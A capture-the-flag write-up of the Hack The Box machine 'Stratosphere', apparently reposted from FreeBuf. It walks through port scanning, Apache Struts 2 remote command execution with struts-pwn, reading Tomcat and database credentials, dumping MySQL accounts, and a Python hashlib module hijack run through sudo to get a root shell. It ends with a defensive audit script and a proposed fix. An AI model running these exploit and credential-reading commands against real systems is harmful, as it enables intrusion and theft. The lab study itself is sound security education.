maptnh

Information Gathering
IP Address | Open Ports
---|---
10.10.10.64 | TCP: 22, 80, 8080
$ ip='10.10.10.64'; itf='tun0'
$ if nmap -sn "$ip" | grep -q "Host is up"; then   # note: adding -Pn here would make this check always succeed
      echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
      # masscan every TCP and UDP port, then turn the results into a comma-separated port list for nmap
      ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" \
              | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -nu | tr '\n' ',' | sed 's/,$//')
      if [ -n "$ports" ]; then
          echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
          nmap -Pn -sV -sC -p "$ports" "$ip"
      else
          echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
      fi
  else
      echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
  fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0)
| ssh-hostkey:
| 2048 5b1637d43c180415c402010ddb07ac2d (RSA)
| 256 e3777b2c23b08ddf38356c40abf68150 (ECDSA)
|_ 256 d76b669c19fcaa666c187accb5870e40 (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"1708-1519762495651"
| Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
| Content-Type: text/html
| Content-Length: 1708
| Date: Wed, 19 Mar 2025 12:49:56 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8"/>
| <title>Stratosphere</title>
| <link rel="stylesheet" type="text/css" href="main.css">
| </head>
| <body>
| <div id="background"></div>
| <header id="main-header" class="hidden">
| <div class="container">
| <div class="content-wrap">
| <p><i class="fa fa-diamond"></i></p>
| <nav>
| <a class="btn" href="GettingStarted.html">Get started</a>
| </nav>
| </div>
| </div>
| </header>
| <section id="greeting">
| <div class="container">
| <div class="content-wrap">
| <h1>Stratosphere<br>We protect your credit.</h1>
| <a class="btn" href="GettingStarted.html">Get started now</a>
| <p><i class="ar
| HTTPOptions:
| HTTP/1.1 200
| Allow: OPTIONS, GET, HEAD, POST
| Content-Length: 0
| Date: Wed, 19 Mar 2025 12:49:56 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1874
| Date: Wed, 19 Mar 2025 12:49:57 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 – Bad Request</h1>
|_ <hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or decept
|_http-title: Stratosphere
8080/tcp open http-proxy
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"1708-1519762495651"
| Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
| Content-Type: text/html
| Content-Length: 1708
| Date: Wed, 19 Mar 2025 12:49:56 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8"/>
| <title>Stratosphere</title>
| <link rel="stylesheet" type="text/css" href="main.css">
| </head>
| <body>
| <div id="background"></div>
| <header id="main-header" class="hidden">
| <div class="container">
| <div class="content-wrap">
| <p><i class="fa fa-diamond"></i></p>
| <nav>
| <a class="btn" href="GettingStarted.html">Get started</a>
| </nav>
| </div>
| </div>
| </header>
| <section id="greeting">
| <div class="container">
| <div class="content-wrap">
| <h1>Stratosphere<br>We protect your credit.</h1>
| <a class="btn" href="GettingStarted.html">Get started now</a>
| <p><i class="ar
| HTTPOptions:
| HTTP/1.1 200
| Allow: OPTIONS, GET, HEAD, POST
| Content-Length: 0
| Date: Wed, 19 Mar 2025 12:49:57 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1874
| Date: Wed, 19 Mar 2025 12:49:57 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 – Bad Request</h1>
|_ <hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or decept
|_http-title: Stratosphere
|_http-open-proxy: Proxy might be redirecting requests
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Struts 2 RCE && Tomcat 8
$ feroxbuster -u 'http://10.10.10.64/'
http://10.10.10.64/Monitoring/example/Welcome.action
$ whatweb http://10.10.10.64/Monitoring/example/Welcome.action -v
The target application runs on Java and the URL ends in .action, which is typically a sign of the Apache Struts 2 (S2) framework.
https://github.com/mazen160/struts-pwn
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'id'
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'cat /etc/tomcat8/tomcat-users.xml'
username: teampwner
password: cd@6sY{f^+kZV8J!+o*t|<fpNy]F_(Y$
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'cat db_connect'
[ssn]
user=ssn_admin
pass=AWs64@on*&
[users]
user=admin
pass=admin
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'mysql -uadmin -padmin -e "SHOW DATABASES;"'
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'mysql -uadmin -padmin -e "SHOW DATABASES;use users;show tables;"'
$ python3 struts-pwn.py --url 'http://10.10.10.64/Monitoring/example/index.action' -c 'mysql -uadmin -padmin -e "SHOW DATABASES;use users;show tables;select * from accounts;"'
username: richard
password: 9tc*rhKuG5TyXvUJOrE^5CK7k
$ ssh richard@10.10.10.64
User.txt
931bcbf5736460e560bce0c4a2312acc
Privilege Escalation: Python module hijack
richard@stratosphere:~$ cat /home/richard/test.py
$ find / -name "hashlib.py" 2>/dev/null -exec ls -la {} \; -exec lsattr {} \;
$ echo 'import os;os.system("/bin/bash")'>hashlib.py
$ sudo python3 /home/richard/test.py
Personally, I think the environment variable should first be pointed at this directory before carrying out the hijack.
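Why the hijack above works: when `sudo python3 /home/richard/test.py` starts, the interpreter puts the script's own directory at the front of sys.path, so a hashlib.py in /home/richard is located before the standard library copy. The audit below is an added example and not code from the original writeup; it stands in a constructed temporary directory for /home/richard, locates modules without importing them, and shows that isolated mode (`python3 -I`, or `-P` on 3.11+) removes the script directory and with it the hijack point.

```python
import os
import sys
import sysconfig
import tempfile
from importlib.machinery import PathFinder

STDLIB_DIR = os.path.realpath(sysconfig.get_paths()["stdlib"])


def effective_path(script_dir, isolated=False):
    """Mimic the interpreter: for `python3 script.py`, sys.path[0] is the
    script's directory. With -I (isolated mode) or -P (3.11+) it is not added."""
    tail = [p for p in sys.path if p]
    return tail if isolated else [os.path.realpath(script_dir)] + tail


def shadowed_modules(script_dir, module_names, isolated=False):
    """Map each module name to the file it would be loaded from when that file
    lies outside the standard library. Nothing is imported or executed:
    PathFinder.find_spec only locates the candidate file."""
    path = effective_path(script_dir, isolated)
    hits = {}
    for name in module_names:
        spec = PathFinder.find_spec(name, path)
        if spec is None or not spec.origin:
            continue  # built-in or namespace module: no file on disk to shadow
        origin = os.path.realpath(spec.origin)
        if not origin.startswith(STDLIB_DIR + os.sep):
            hits[name] = origin
    return hits


def writable_path_entries(path):
    """Import-path directories the current user can write to. Any such entry
    ahead of the stdlib lets an unprivileged user plant a module that a
    privileged interpreter (sudo python3 ...) will import first."""
    return [d for d in path if os.path.isdir(d) and os.access(d, os.W_OK)]


def demo():
    """Constructed scenario (a temp dir, not the box itself): a user-writable
    directory holding an empty hashlib.py next to the script that will be run."""
    with tempfile.TemporaryDirectory() as script_dir:
        open(os.path.join(script_dir, "hashlib.py"), "w").close()
        normal = shadowed_modules(script_dir, ["hashlib", "os"])
        isolated = shadowed_modules(script_dir, ["hashlib", "os"], isolated=True)
        writable = os.path.realpath(script_dir) in writable_path_entries(effective_path(script_dir))
    return normal, isolated, writable
```

The defensive fix is the mirror image of the attack: a script that runs under sudo belongs in a root-owned, non-writable directory and should be launched with `python3 -I`, which is what `isolated=True` models.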
Root.txt
8d7e34dc0d82718cf7f15fa8b6113a1f
For reprint authorization, questions about this article, or removal requests, please contact FreeBuf customer service (WeChat: freebee1024).
